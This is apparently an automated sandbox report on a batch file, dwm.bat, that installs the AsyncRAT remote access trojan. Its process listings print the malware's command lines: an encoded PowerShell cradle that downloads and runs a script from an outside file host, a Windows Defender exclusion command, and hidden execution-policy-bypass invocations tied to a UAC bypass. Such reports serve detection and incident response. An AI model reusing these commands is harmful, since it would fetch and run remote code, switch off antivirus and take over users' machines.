File name:

dwm.bat

Full analysis: https://app.any.run/tasks/27f1a007-4225-484f-8ee1-f172dc1aa4d1
Verdict: Malicious activity
Threats:

AsyncRAT is a remote access trojan (RAT) that can monitor and remotely control infected systems. It was published on GitHub as legitimate open-source remote administration software, but attackers use it for its many powerful malicious functions.

Analysis date: January 30, 2025, 08:27:28
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
susp-powershell
stealer
fody
rat
asyncrat
remote
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (57718), with CRLF line terminators
MD5:

151B7FE444AF5423AD79C0C83558B402

SHA1:

664D48C7C188A5085FDE5A50842F63F5F2191BFE

SHA256:

DF22C1BF851BE9C64682E7838B6B88358C64A9E3FD6E8AD305F7303D06660323

SSDEEP:

12288:O3WghT6onokzHxgSVW0U/cBGnciS8mJa4Ce:4hT5i9/cBGhFmJaze

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 3848)
      • powershell.exe (PID: 4120)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3536)
    • Known privilege escalation attack

      • dllhost.exe (PID: 3568)
    • Adds process to the Windows Defender exclusion list

      • dllhost.exe (PID: 3568)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Actions look like stealing of personal data

      • powershell.exe (PID: 4120)
    • ASYNCRAT has been detected (SURICATA)

      • powershell.exe (PID: 4120)
  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 1704)
    • Application launched itself

      • cmd.exe (PID: 1704)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1704)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3536)
      • dllhost.exe (PID: 3568)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3536)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3536)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6784)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 6784)
    • Script adds exclusion process to Windows Defender

      • dllhost.exe (PID: 3568)
    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • powershell.exe (PID: 4500)
    • Script adds exclusion path to Windows Defender

      • dllhost.exe (PID: 3568)
    • Uses TASKKILL.EXE to kill process

      • dllhost.exe (PID: 3568)
    • Contacting a server suspected of hosting a CnC

      • powershell.exe (PID: 4120)
    • Connects to unusual port

      • powershell.exe (PID: 4120)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 4120)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 4500)
    • Checks proxy server information

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)
    • Found Base64 encoded network access via PowerShell (YARA)

      • cmd.exe (PID: 3536)
      • powershell.exe (PID: 4500)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 4500)
    • Found Base64 encoded file access via PowerShell (YARA)

      • cmd.exe (PID: 3536)
    • Checks supported languages

      • csc.exe (PID: 6784)
      • cvtres.exe (PID: 6920)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 6784)
    • Creates files in a temporary directory

      • cvtres.exe (PID: 6920)
      • csc.exe (PID: 6784)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3848)
    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 6984)
    • Creates files in the program directory

      • dllhost.exe (PID: 3568)
    • Detects Fody packer (YARA)

      • powershell.exe (PID: 4500)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3848)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4120)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4120)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
142
Monitored processes
15
Malicious processes
5
Suspicious processes
0

Behavior graph

start cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe csc.exe cvtres.exe no specs cmstp.exe no specs CMSTPLUA powershell.exe no specs conhost.exe no specs #ASYNCRAT powershell.exe taskkill.exe no specs conhost.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID:
1704
CMD:
C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\dwm.bat" "
Path:
C:\Windows\System32\cmd.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID:
2144
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
2192
CMD:
C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path:
C:\Windows\System32\svchost.exe
Parent process:
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID:
3536
CMD:
C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\dwm.bat"
Path:
C:\Windows\System32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID:
3568
CMD:
C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Path:
C:\Windows\System32\dllhost.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
PID:
3820
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
3848
CMD:
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
dllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\atl.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\msvcp_win.dll
PID:
4120
CMD:
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
Path:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID:
4500
CMD:
powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
5652
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 222
Read events
18 196
Write events
26
Delete events
0

Modification events

(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
EnableFileTracing
Value:
0
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
EnableAutoFileTracing
Value:
0
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
EnableConsoleTracing
Value:
0
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
FileTracingMask
Value:
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
ConsoleTracingMask
Value:
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
MaxFileSize
Value:
1048576
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:
write
Name:
FileDirectory
Value:
%windir%\tracing
(PID) Process:
(3568) dllhost.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation:
write
Name:
ProfileInstallPath
Value:
C:\ProgramData\Microsoft\Network\Connections\Cm
(PID) Process:
(6984) cmstp.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Network Connections
Operation:
write
Name:
DesktopShortcut
Value:
0
(PID) Process:
(3568) dllhost.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation:
write
Name:
SM_AccessoriesName
Value:
Accessories
Executable files
2
Suspicious files
7
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID:
6784
Process:
csc.exe
Filename:
C:\Users\admin\AppData\Local\Temp\vyxgcijg.dll
Type:
executable
MD5: 0D5AC81212B21B55DD9BC5461A325CB9
SHA256: 96814DAABFBD352865E3FFD40EB1C2E9F1FCD8C6311FE858D1675C908C8F4F69
PID:
4500
Process:
powershell.exe
Filename:
C:\Windows\Temp\dnb3vetm.inf
Type:
text
MD5: 05662B83FF7DB6317E391454787598D8
SHA256: 0322B78214D9FB1D40D9BF162A44F9A5FE13FCB21C96B8B0F0E289E939A9FA5C
PID:
6920
Process:
cvtres.exe
Filename:
C:\Users\admin\AppData\Local\Temp\RES9195.tmp
Type:
binary
MD5: EAFC9AEBC301A68060F47819BE7E5C34
SHA256: 06F2F3027847C4D071183249E3BAC8F93BED794E9A4E06ABB6B3758544018A52
PID:
4500
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Local\Temp\vyxgcijg.0.cs
Type:
text
MD5: B126AC3DA39FFA35CB857267CBC70CBB
SHA256: 6E6DD39153A84B94B4F309A4C4521260CBDD8A6922ADE46096F42DA39BC20B93
PID:
6784
Process:
csc.exe
Filename:
C:\Users\admin\AppData\Local\Temp\CSC10A73122AECC4C8D9594F3EA6BEF9AB.TMP
Type:
binary
MD5: 9505958D90497DCF4CE8D50DB32BF29F
SHA256: 623D9855F1BE340A906693C228DCC868F93786ED01E6BC3427EFAC7269860676
PID:
6784
Process:
csc.exe
Filename:
C:\Users\admin\AppData\Local\Temp\vyxgcijg.out
Type:
text
MD5: 5859DC6A9DDD860D3A9F8D9DBAC9AE82
SHA256: 18D6CBBEC1B24FE69585BDFD487870B363DFCD89EEC5905E56CBB70F913993FF
PID:
4500
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Local\Temp\vyxgcijg.cmdline
Type:
text
MD5: 9829CEE0F227177ADBCE212E2822794F
SHA256: 7CFD43BD1449DA12459475B69213BF9C6511370CA646A0F9B8E7DD4D0671C782
PID:
3848
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RP5X48NBYGR8AYVSY94S.temp
Type:
binary
MD5: E9ADC7F941C7D5A31CCC346DBD7635E4
SHA256: 0DC7697F04A2EA776D6BF2A92747B3132FBDDEA0DAD5F667C25F47070A0F7B15
PID:
3848
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF139fcd.TMP
Type:
binary
MD5: D040F64E9E7A2BB91ABCA5613424598E
SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
PID:
3848
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Type:
binary
MD5: E9ADC7F941C7D5A31CCC346DBD7635E4
SHA256: 0DC7697F04A2EA776D6BF2A92747B3132FBDDEA0DAD5F667C25F47070A0F7B15
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
33
DNS requests
16
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6332
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6332
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6700
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1344
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5064
SearchApp.exe
104.126.37.128:443
Akamai International B.V.
DE
unknown
3976
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4500
powershell.exe
168.119.145.117:443
0x0.st
Hetzner Online GmbH
DE
suspicious
5064
SearchApp.exe
104.126.37.176:443
Akamai International B.V.
DE
unknown
5064
SearchApp.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
1176
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
www.microsoft.com
  • 184.30.21.171
whitelisted
0x0.st
  • 168.119.145.117
unknown
ocsp.digicert.com
  • 184.30.131.245
  • 2.23.77.188
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.128
  • 20.190.160.130
  • 40.126.32.140
  • 40.126.32.133
  • 40.126.32.74
  • 20.190.160.67
  • 20.190.160.17
whitelisted
go.microsoft.com
  • 184.30.18.9
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted
fd.api.iris.microsoft.com
  • 20.74.47.205
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (0x0 .st)
4500
powershell.exe
Misc activity
ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
4120
powershell.exe
Misc activity
ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
4120
powershell.exe
Domain Observed Used for C2 Detected
ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert
4120
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] AsyncRAT Successful Connection
No debug info